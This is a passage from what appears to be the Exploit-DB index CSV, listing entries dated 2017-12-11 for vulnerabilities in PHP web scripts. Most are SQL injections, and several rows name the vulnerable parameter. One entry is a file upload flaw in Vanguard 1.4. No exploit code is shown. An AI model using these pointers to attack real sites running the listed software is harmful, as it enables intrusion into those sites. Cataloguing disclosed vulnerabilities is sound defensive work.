43293,exploits/php/webapps/43293.txt,"PHP Multivendor Ecommerce 1.0 - 'sid' / 'searchcat' / 'chid1' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43294,exploits/php/webapps/43294.txt,"Professional Service Script 1.0 - 'service-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43295,exploits/php/webapps/43295.txt,"Readymade PHP Classified Script 3.3 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43296,exploits/php/webapps/43296.txt,"Readymade Video Sharing Script 3.2 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43299,exploits/php/webapps/43299.txt,"Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43300,exploits/php/webapps/43300.txt,"Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43301,exploits/php/webapps/43301.txt,"Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43302,exploits/php/webapps/43302.txt,"Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43304,exploits/php/webapps/43304.txt,"Advanced Real Estate Script 4.0.7 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43305,exploits/php/webapps/43305.txt,"Entrepreneur Bus Booking Script 3.0.4 - 'sourcebus' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43306,exploits/php/webapps/43306.txt,"MLM Forex Market Plan Script 2.0.4 - 'newid' / 'eventid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43307,exploits/php/webapps/43307.txt,"MLM Forced Matrix 2.0.9 - 'newid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43309,exploits/php/webapps/43309.txt,"Groupon Clone Script 3.01 - 'state_id' / 'search' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43310,exploits/php/webapps/43310.txt,"Muslim Matrimonial Script 3.02 - 'succid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43311,exploits/php/webapps/43311.txt,"Advanced World Database 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43314,exploits/php/webapps/43314.html,"Basic Job Site Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,
43315,exploits/php/webapps/43315.txt,"Vanguard 1.4 - Arbitrary File Upload",2017-12-11,"Ihsan Sencan",webapps,php,
43316,exploits/php/webapps/43316.txt,"Vanguard 1.4 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.